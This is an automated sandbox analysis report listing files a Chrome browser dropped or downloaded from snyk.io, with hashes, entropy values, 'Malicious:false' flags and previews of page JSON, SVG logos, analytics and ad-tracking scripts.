                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65492), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):147847
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.125449075403839
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:trCDhUk0Rwiws4/MSX2sBEzlTXYkCRzsy:0DikUwiu9X2KEzRYkCp
                                                                                                                                                                                                                                                                                                              MD5:0005E618393045EACCC86E88590B984B
                                                                                                                                                                                                                                                                                                              SHA1:88B59ACEA5C397F0AA8FA5A423786AC168E4DD72
                                                                                                                                                                                                                                                                                                              SHA-256:4332E385EE6ADC0CF9BBB47067B1CF923076BAB58F59360283AE15ADFE3A6AA8
                                                                                                                                                                                                                                                                                                              SHA-512:F012B6267A736D238F2CA1C7B91E3F43D1AE4CE67507609AAD6AC54CD409E5117F76CA90DF9C41863FB87DD980D9385C06A2050DAE01AB15D5A5969F61E7D385
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4lOqYRNZrI6rMIJFuDgvhh","type":"Entry","createdAt":"2022-10-20T00:48:56.205Z","updatedAt":"2023-09-22T17:30:06.826Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":106,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Snyk Open Source","title":"Open Source Security Management | SCA Tool | Snyk","slug":"open-source-security-management","uri":"product/open-source-security-management","pageLocalization":["de","fr","ja","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4HLqvq9asbGHkX5FPN4al0","type":"Entry","createdAt":"2022-10-20T00:48:56.296Z","updatedAt":"2023-04-11T18:35:33.223Z","environment":{"sys":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1827
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.789742547111478
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHpdS3SKtHPaX+WGM+6bqH119pTMb0fKOhqbQRkVubJts1K:tTNKtvAGM+iqH1pTfKOhqbQRkVub/sQ
                                                                                                                                                                                                                                                                                                              MD5:672ED876D94B9AC8D10AAC5F6C4054DD
                                                                                                                                                                                                                                                                                                              SHA1:89BF7D137FB563CB060C967969D319CAE7F5807C
                                                                                                                                                                                                                                                                                                              SHA-256:F5D674B1351517C72FE4667A79D8379AA6946BD4F4F186018D843784BD8B752B
                                                                                                                                                                                                                                                                                                              SHA-512:D8A24DD770946272FC9968E943EFC8229985DBFAA3EAD04BA0BF93D00282877E917EAC8100B0B0440A6378970406E88B667779984ADA96A76B54D812B95E3200
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="4" x2="59.8364" y1="4" y2="49.0471"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="60" x2="24.0154" y1="22" y2="49.5836"><stop offset="0" stop-color="#4bd6b5"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.5 59.9867c-.1247.0177-.2513.0177-.376 0-15.7794-5.2786-23.12277-15.9992-23.12277-33.7929v-13.9832c-.01186-.2571.06238-.5108.21116-.7216.14878-.2107.36372-.3668.6113-.4437l22.32381-6.99163c.2295-.07156.4755-.07156.705 0l22.3238 6.99163c.2476.0769.4625.233.6113.4437.1488.2108.223.4645.2112.7216v7.1963c-1.4541-.8919-3.1646-1.4069-4.9988-1.4069-5.3202 0-9.6 4.3329-9.6 9.6296 0 .131.0026.2618.0079.3922l-2.8928-.0218h-.0151c-1.6248 0-2.9741.7378-3.865
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65499), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):69163
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.06770369814948
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:3SZsObF6KsAosmjef5ArgnUX6tfqXr9fabiN1e:3iz3osRft5MY
                                                                                                                                                                                                                                                                                                              MD5:723D86127852A6BD24C6EB56EBA25783
                                                                                                                                                                                                                                                                                                              SHA1:2347E3580B228606645437517AEA015928DF8D93
                                                                                                                                                                                                                                                                                                              SHA-256:AFE4C536CD6CAD0DE2A3FFF7BB0DDECB20792DD791BD51C052E2EF63C48AF65B
                                                                                                                                                                                                                                                                                                              SHA-512:A343EB2F9D780DDBB1B91B0A96B9C526963A3301674DFBE87F2758162904021C888B7D4AB14F07E1716E7B9F46DD732DB9D2595F9D7252C96ED2F485D5E22EA4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7aZtlrc4eCMYn9rB8xFjti","type":"Entry","createdAt":"2023-06-02T10:35:07.837Z","updatedAt":"2024-10-10T15:34:51.295Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":132,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateSeriesArticle"}},"locale":"en-US"},"fields":{"internalName":"\"What is Ethical Hacking?\" - Series","title":"What is Ethical Hacking?","subtitle":"What is ethical hacking and how can you use it to your advantage?","uri":"ethical-hacking","contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2nyA408zbqpqw9o55xFv9","type":"Entry","createdAt":"2023-06-02T10:35:07.933Z","updatedAt":"2023-08-25T23:30:34.306Z","environment":{"sys":{"id":"master","type":"Link","linkType":"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18122)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):240139
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.520253008633237
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:/IfEnRhbIGc3kWhe1ZF0cSncEjCPfrgiA4as3rOXk9nObg4:TRo3k4KCJviKs3qXk9nOb7
                                                                                                                                                                                                                                                                                                              MD5:A0F580B5609105E42AF1D25A9EC32AAA
                                                                                                                                                                                                                                                                                                              SHA1:82D6FE2FB6101E2B031D44174CAFA8535993C765
                                                                                                                                                                                                                                                                                                              SHA-256:A93A062FFE6C27D066D8E759EF8B577F3323782C8815C9138E507B8AF4FC25B4
                                                                                                                                                                                                                                                                                                              SHA-512:6E36A79945FB5022D787AE0EFDF0AF6C9FCD0D8E0354C4E0EBF48C5BC05BF6F571CC5CD8AB9F955D21D32C756C4D369FDF751AF6081EE3902A5EF518198FE13D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-X9SH3KP7B4"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"category_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_location"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_type"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"link_url"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"outbound"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"subcategory_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"newsletter_name"},{"function":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4851), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4851
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.428670760452963
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:nz+dTbudjEdUBRRjOjRwqiXICG7NO92pUWpxlHLIZ4:SlSxjOyqiYrNOXCrIZ4
                                                                                                                                                                                                                                                                                                              MD5:FFE5DE25445830E533B0F09CE0CC9E25
                                                                                                                                                                                                                                                                                                              SHA1:EF741C976A767D91783B21F4DBD72A052D9C80A6
                                                                                                                                                                                                                                                                                                              SHA-256:CEF3803F45535D14C06E7404F7F307003D11884E3F60FCB58C06616DCE6EFCDF
                                                                                                                                                                                                                                                                                                              SHA-512:86567B8E0C7632DD39D3B44564FFB24C75EC45B0FDF8AF4256B9048D44B7646706E7B3AE8DE6A9F60B2DFEBA84E04C01F5632C00709E943D61275780B720B981
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6923],{96923:function(e,o,r){r.r(o),r.d(o,{default:function(){return v}});var t=r(85893),n=r(4298),s=r.n(n),l=r(67294),a=r(45697),i=r.n(a),d=function(e){let{isInlined:o}=e;return(0,t.jsx)("div",{className:"w-full max-w-full border-box d-flex flex-col gap-medium bg-white",children:Array(o?1:5).fill().map((e,o)=>(0,t.jsx)("div",{className:"h-extra-large w-full bg-skeleton radius-medium"},o))})},m=r(44133),c=r(93441),u=r(62792),f=r(9981),p=r(23751);function g(e){var o;let r={1:"Unsubscribe",1004:"Event",1015:"Book a demo",1023:"Subscription management",1034:"Asset download",1047:"Contact us",1051:"Newsletter",1055:"Other",1058:"Other",1059:"Book a demo",1125:"Event",1177:"Contact us",1180:"Event",1198:"Event",1203:"Other",1284:"Subscription management",1338:"Book a demo",1461:"Other",1627:"Other",1628:"Event",1629:"Contact us",1630:"Newsletter",1631:"Newsletter",1632:"Contact us",1633:"Event",1634:"Other",1635:"Subscrip
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):813
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.156399074128828
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:n5ndskw4IrZa2quJZVe0WJarMquD1IKAqEMXKto3IkRWZvJZy:5dsIwZYuJqgrgD1pKq3IkRWZvJZy
                                                                                                                                                                                                                                                                                                              MD5:1504BEF206821DB8382F43094B84A3FE
                                                                                                                                                                                                                                                                                                              SHA1:54835A21D8FE5D2E8F6AF92144D0CA5E6699F0F4
                                                                                                                                                                                                                                                                                                              SHA-256:7B720BCA62DFA1C26BE9A32896B24449344BF86440FC06AF3FA2A15752F2B3DD
                                                                                                                                                                                                                                                                                                              SHA-512:FFF0C6133C72CE3D41CED9B1269CC38B864694F0C1383F39667E67348C2EC4E1380723039EDE0D61493A05B74EB3CA5E84A0C600D07FCD98272101C723B90D28
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/scripts/microsoftBingUET.js
                                                                                                                                                                                                                                                                                                              Preview:UET_ID = typeof document !== 'undefined' ? document?.querySelector('script[id="trd-flame-load"]')?.getAttribute('data-id') : null;.if (UET_ID) {..// console.log('Microsoft (Bing/UET) Advertising Remarketing Running');..(function (w, d, t, r, u) {...var f, n, i;...(w[u] = w[u] || []),....(f = function () {.....var o = {......ti: UET_ID,.....};.....(o.q = w[u]), (w[u] = new UET(o)), w[u].push('pageLoad');....}),....(n = d.createElement(t)),....(n.src = r),....(n.async = 1),....(n.onload = n.onreadystatechange =.....function () {......var s = this.readyState;......(s && s !== 'loaded' && s !== 'complete') || (f(), (n.onload = n.onreadystatechange = null));.....}),....(i = d.getElementsByTagName(t)[0]),....i.parentNode.insertBefore(n, i);..})(window, document, 'script', '//bat.bing.com/bat.js', 'uetq');.}.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):147108
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5803005055641925
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:+jEcqpGMZsqe1/VuVOoaaPeU8zPkS/Ae7uKhgQnRaVohs0V6Nnk6dRLnOgIAox+Q:yAOJMOgZoUQ
                                                                                                                                                                                                                                                                                                              MD5:FBD5502595F9F5D3F06B2D4696ED051F
                                                                                                                                                                                                                                                                                                              SHA1:AF41615F2888FBD172F5DD289589629269CAA6C2
                                                                                                                                                                                                                                                                                                              SHA-256:2E80A7FB5F519CAF032F672FF2DAF9112977F90C46703A91B029A17ED1FF1F30
                                                                                                                                                                                                                                                                                                              SHA-512:35545EC5664C41DA859BA3E1D115CE7ABE9A128EE054410F4C9EFDE95F65C037AA0446EDC8E4D64A6DF820FBC6F7BA941793AF7ECF678731BE7B3028E1A06591
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1687269496/logocluster-developement-lifecycle-updated.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="619" height="396" viewBox="0 0 619 396" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2_2)">.<mask id="mask0_2_2" style="mask-type:luminance" maskUnits="userSpaceOnUse" x="0" y="0" width="619" height="396">.<path d="M607 0H12C5.37258 0 0 5.37258 0 12V384C0 390.627 5.37258 396 12 396H607C613.627 396 619 390.627 619 384V12C619 5.37258 613.627 0 607 0Z" fill="white"/>.</mask>.<g mask="url(#mask0_2_2)">.<path d="M607 0H12C5.37258 0 0 5.37258 0 12V384C0 390.627 5.37258 396 12 396H607C613.627 396 619 390.627 619 384V12C619 5.37258 613.627 0 607 0Z" fill="white"/>.<path d="M140.037 0H86.3391C81.9455 0 78.3838 3.56169 78.3838 7.95526V61.6532C78.3838 66.0468 81.9455 69.6085 86.3391 69.6085H140.037C144.431 69.6085 147.992 66.0468 147.992 61.6532V7.95526C147.992 3.56169 144.431 0 140.037 0Z" fill="white"/>.<path d="M61.6532 0H7.95526C3.56169 0 0 3.56169 0 7.95526V61.6532C0 66.0468 3.56169 69.6085 7.95526 69.6085H61.6532C66.0468 69.6085 69.6085 66.0468 69.608
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65499), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):69163
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.06770369814948
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:3SZsObF6KsAosmjef5ArgnUX6tfqXr9fabiN1e:3iz3osRft5MY
                                                                                                                                                                                                                                                                                                              MD5:723D86127852A6BD24C6EB56EBA25783
                                                                                                                                                                                                                                                                                                              SHA1:2347E3580B228606645437517AEA015928DF8D93
                                                                                                                                                                                                                                                                                                              SHA-256:AFE4C536CD6CAD0DE2A3FFF7BB0DDECB20792DD791BD51C052E2EF63C48AF65B
                                                                                                                                                                                                                                                                                                              SHA-512:A343EB2F9D780DDBB1B91B0A96B9C526963A3301674DFBE87F2758162904021C888B7D4AB14F07E1716E7B9F46DD732DB9D2595F9D7252C96ED2F485D5E22EA4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/ethical-hacking.json?slug=ethical-hacking
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7aZtlrc4eCMYn9rB8xFjti","type":"Entry","createdAt":"2023-06-02T10:35:07.837Z","updatedAt":"2024-10-10T15:34:51.295Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":132,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateSeriesArticle"}},"locale":"en-US"},"fields":{"internalName":"\"What is Ethical Hacking?\" - Series","title":"What is Ethical Hacking?","subtitle":"What is ethical hacking and how can you use it to your advantage?","uri":"ethical-hacking","contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2nyA408zbqpqw9o55xFv9","type":"Entry","createdAt":"2023-06-02T10:35:07.933Z","updatedAt":"2023-08-25T23:30:34.306Z","environment":{"sys":{"id":"master","type":"Link","linkType":"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 3013
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1343
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.846151361722259
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:XZ4Hjl9i7F/Oajiwwsaj9u4f+0HNw37gfTMtJ9gvKyjV0BUmr8Q56Lt:XZ4HcOwiwwsoffy7ff9giyeD0Lt
                                                                                                                                                                                                                                                                                                              MD5:A2B1AA1A0E402B1F891C929F94449D47
                                                                                                                                                                                                                                                                                                              SHA1:7E1A4A1F5943973E090203B040140F047655391C
                                                                                                                                                                                                                                                                                                              SHA-256:CC74BA8D8C6BCB2241B30F1DD4CE80A6C27427895CB9EE1047DCC90F368AF1C7
                                                                                                                                                                                                                                                                                                              SHA-512:F2D09931D7A97EA765DC2C94552148CEB50F0E0EE1898FDCCFAC106421BCB890E9BFBE87469A95812BB1B2AB55EF329E476EBF4E95394701955B53BDA72810DB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/next-integrations/integrations/google-tag-manager/2.5.1/google-tag-manager.dynamic.js.gz
                                                                                                                                                                                                                                                                                                              Preview:...........V[o.6.~.9@.Q...^V+\Q,...i.u{2...N.v2..T<....$...}.`X...;...V:7..IaLQ....JjY.=..,"...Xi...^....&v.....\...o. ......U.r..-..."]?....9...u...7..6..k...<4.8$B.bo..v.. .....J.i...0.,X...e.x.`...B..iy.x...7i..9U..........5..M..F.Ok......L.eb..ql.j....jw.....,,.$.y.H...b.]&~....?.z....b.)-..Q.>..M{.d...UUn....9.a..........3...X.^j...i1. ~.....zA..v...d$..W.A..S.h\I.Re..S6....(.....M..o...m..z;.4L...3V...:.....?...].....r6..^8.6.....Z...YvX+.......F..L.L...|0n.....Kzw..6.k.a..Vm..^....f..?..m..7...uNF".....lVKS.q...|.V...Y..S...2lVY.\....4.=eL....j;..K..+.m.4.0..ZO).!.].|..AJL...]M>..."...^..e...D.eI.;.,.O.n..7..=9F...c./.\...dO.\....i...\,v0D._";.y.Y.>.0..Z.|.8.....^y.{3{D.....0"... .3G-....h.A.Q.BZ...X..aY.._....+....7)..A.u.!.p9.v[..'....:v..3.....r.$n.!..q-..4..[.K.&=.%....QR;.B.q..llBn...7A...W....MH... 7`q..VV.#83R.........).S.]v....(.R.C..w..v.7..jo`.6E...%.....#...[e.^.....".....3.r..&G.......`..hs...;9s.U.........5..D.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65513), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):87495
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.096192842839349
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:4woYclr6p9XjyT3vHsvZvjdR6Pta9IboltYTeu0/kikEMVvpxl+fm9re9PE8waMe:NWup1yT3sT9bltYTeu0/ki4Xr9faMe
                                                                                                                                                                                                                                                                                                              MD5:F848AF443814368E0D91BE08E938EAEF
                                                                                                                                                                                                                                                                                                              SHA1:4116DABAB93767261819B97B37E4227670BD577F
                                                                                                                                                                                                                                                                                                              SHA-256:E1807216B2C520B419B6F3E1B6EA84D463BCC23E869E4FC2E54F51AE197C5948
                                                                                                                                                                                                                                                                                                              SHA-512:C656202A3B4D10D9D461099CBC8C9C6076836EE72D25883D45F94741210DBAB456A3892350808C0DF7146608805D6E84C3BECFBC1549CCFAC87EBC8D810224DB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json?slug=product&slug=container-vulnerability-management
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6OeonPIxF0eJJEqXeb7e4l","type":"Entry","createdAt":"2022-10-20T15:39:10.099Z","updatedAt":"2024-05-01T11:45:06.864Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":56,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Snyk Container","title":"Container vulnerability management & Kubernetes workload security | Snyk","slug":"container-vulnerability-management","uri":"product/container-vulnerability-management","pageLocalization":["de","ja","fr","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"NfI2TnwVAmXHhiC3XkyHM","type":"Entry","createdAt":"2022-10-20T15:39:10.225Z","updatedAt":"2023-06-07T16:59:28.06
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2178
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.661839168851514
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHV/UUS31HUVHhWB1rS7TeT5pB6MMU+4pBbUz/RkjX346CiZT0Ic:tT1i0V8B1rUKtCC+Soz/xvit0v
                                                                                                                                                                                                                                                                                                              MD5:98006D843AD15D2FD94BF5976616057B
                                                                                                                                                                                                                                                                                                              SHA1:0ABE10ED106B2CAB2C3E74370E84D4D5BD3EF8BD
                                                                                                                                                                                                                                                                                                              SHA-256:EA7809760ED48C05CE98FF011046DD45DFF75F0C0829F385E298C018AE4E4220
                                                                                                                                                                                                                                                                                                              SHA-512:25DD7BD4C8C4B3ECED669258387CB99DF074241B4C27EE67C10396DEAEF2E7C086EE93D31CDD5B8B054BEE6EB8E6F4B90A2C6C97481323D4505BFA758D45F904
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/product-logos/oss.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="10.7808" x2="68.169" y1="3.99999" y2="17.4721"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="26.2413" x2="73.3406" y1="20.9091" y2="34.2228"><stop offset="0" stop-color="#43b59a"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.1091 60.3503c.1246.0178.2511.0178.3757 0 .1247.0178.2512.0178.3758 0 1.4278-.481 2.7864-1.007 4.0768-1.579l-12.5621-7.8315-.1019-.0763c-.893-.668-1.728-1.8674-1.728-3.3748 0-1.2633.5866-2.6834 1.8708-3.4813l-.0374-.0232-.1054-.0789c-.893-.668-1.728-1.8674-1.728-3.3748 0-1.5075.835-2.7068 1.728-3.3748l.0893-.0669-.0893-.0668c-.7949-.5947-1.728-1.6949-1.728-3.3749 0-1.3101.6309-2.7888 2.0165-3.5673l18.5467-11.5625.0234-.014c1.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 960x502, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):11678
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.982420006940561
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:b0TJDTDnzCZp0FQ5U9RF5iy1IAHJVZllBpUQvau3gwgezu6Yl+7me0:b0TJzzI0FQq9RF5H1lVDBMuwJhSE
                                                                                                                                                                                                                                                                                                              MD5:8A3C261C94FEDE30365F963A3F4362D7
                                                                                                                                                                                                                                                                                                              SHA1:821CE34D6FA2F2BF481A1D0569E23BE0CF3221F3
                                                                                                                                                                                                                                                                                                              SHA-256:284105C8A4140C7CB47ACFFD6F738C909F38B68C18A88443EF833D2E15647E69
                                                                                                                                                                                                                                                                                                              SHA-512:9F448E4C07553770DF391F251AF71E6FDD373E207F9EE5A1F1743DFD6CFA9717C1930C7B454C8F51D87D5EFAB1542D746669777750301AFC4CA2CC3CD49E942B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&w=960&q=75
                                                                                                                                                                                                                                                                                                              Preview:RIFF.-..WEBPVP8 .-.......*....>.F.L%....PH....en.....|.../m..:y..]..o...z!.)..........o[.R?.E......t..h...................<..K.?..a..........G.....}...........n.8..@..?....K...~.....v..S.....+Uy.........].oe.~.{$.....7(..+.PA...;.il..E.....t3X...G.m.v~...r...6A......s{..y.....q.^k...mM........4...>i...e T..sxN......kk.....2.....#.T...... .u..Hi.)..H....."..N.uo.c..>m.z2.q$....oy.8..k..B.....G..t-.=R?~...2...*.-..$..F.......A|......H...b..G..Ca._...rsc..j...B.d.x$)..,.+|.~~......\.....s..E{..$...;.b..Lq..bv.&jnG.7?..b...P.)a...sAk.Z....j.9..g.F.w....R.4{..<|......&...G..Oy..ZC.d..t^I.....#S..6|2.p.Xn...W...(.("..GP..4......l..../..E%KL..B..r...,K....i...~~..ku..*.F..|....A..<.3....hnn..I..`.&,+.............u..8......8..B..-T.J...^...[S.6.......C\.C..R..E.B.j.8..wwq....a..W..hR....l.~.H..8...5v.A.. ...|~.X.......>..0.jp4.......pn..'...r....GI....[L..1I...._..`./.eb?..bm1...."Up........f..(J+..j...;H.\..A...v....K..:6..GeE...V......39..c
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
